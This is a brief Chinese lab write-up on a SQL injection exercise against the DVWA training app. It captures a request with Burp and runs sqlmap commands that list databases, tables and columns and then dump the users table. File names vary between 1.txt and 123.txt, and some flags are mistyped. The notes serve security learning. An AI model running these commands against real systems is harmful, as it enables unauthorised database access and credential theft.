#提交一个数据包,用burp抓包
#创建一个1.txt文件,将获取的数据复制进去(在本机创建后复制到虚拟机内)
#点击文件在这里打开终端,输入sqlmap -r 1.txt --data=id --batch(-r参数是指定一个文件,-data是指定我们要进行sql注入的参数,-batch意思是选择默认参数)
#使用下面命令列出数据库的裤名
sqlmap -r 1.txt --data=id --batch -dbs
#sqlmap -r 1.txt --data=id --batch -D dvwa --tables
选择dvwa库查看表名,发现guesbook 和users
获得user表,再通过下面命令列出dvwa数据库下,users表中的列名
sqlmap -r 123.txt --data=id --batch -D dvwa -T users –columns
使用sqlmap -r 123.txt --data=id --batch -D dvwa -T users –dump语句能查看所有users表中内容
在这里插入图片描述
Sqlmap 实验
最新推荐文章于 2024-05-21 23:01:17 发布